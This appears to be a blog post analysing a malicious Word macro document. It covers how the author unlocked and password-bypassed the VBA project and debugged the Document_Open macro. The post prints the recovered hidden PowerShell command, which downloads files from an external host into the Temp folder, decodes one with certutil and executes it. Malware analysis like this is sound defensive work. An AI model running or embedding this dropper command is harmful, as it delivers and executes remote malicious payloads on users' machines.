Word Macro Malware Analysis

Hash: 98fe0b166f550446cbf9e0f368eb8bea79d2eec29fa033cee1ff8f8e38a12836

Sample Download Source: beta.virusbay.io

File Type: Microsoft Word Document

File Format: .doc

VirusTotal Scrore: 32/62

Document Preview:


File Property:

cmd> olemeta.py <filename>

Document Macro Analysis:

cmd> olevba.py -a <filename>

Document_Open macro executes on opening document.


The first thing I was trying to access Macro. By default it was disabled, to enable it go to Files > Options > Trust Center > Macro Settings > Select Enable all macros and select checkbox Trust access to the VBA project object mode


Post enabling macro, I navigate to View > Macros > View Macros 

There are macros in document.


I tried to step into Document_Open macro which executes on document open. But I got an error Project Locked and Project is unenviable.


To make it viewable, I downloaded tool EvilClippy. This tool create new copy of word document in same directory as your current document.


Now when I open document which is project viewable and open VBA Development tool by pressing F11 and tried to open macro code, I was getting Project Password prompt.


To remove/bypass this password, there is a VBA code, Git hub link

I am going to create a new module and paste this code there and run the macro unprotected


Debugging Macro

I started debugging macro code and found below code runs PowerShell command


PowerShell that written to location C:\Users\<profile>\AppData\Roaming\Temp\


PowerShell command that executes via command line.

powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://neoneo-bg.site/hIeak.dat,http://neoneo-bg.site/geTask.dat,http://neoneo-bg.site/rTTj.dat -Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",\"$env:TEMP\rTTj.com\"; Set-Location -Path \"$env:TEMP\"; certutil -decode sfera po15p; Start-Process vido.com -ArgumentList po15p

PowerShell connects to the below URLS and save files vido.com, rTTj.com and sfera to location C:\Users\<user>\AppData\Local\Temp

I tried to debug the PowerShell script but the URL is no more accessible. Sadly, I couldn’t download the files those gonna download by this script.


VirusTotal Score: 5/71



VirusTotal Score: 7/71



VirusTotal Score: 5/71



  • On opening document, word macro executes PowerShell command.
  • PowerShell command downloads file to Temp folder.

Thank you. Please post comments for suggestions.

4 thoughts on “Word Macro Malware Analysis

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.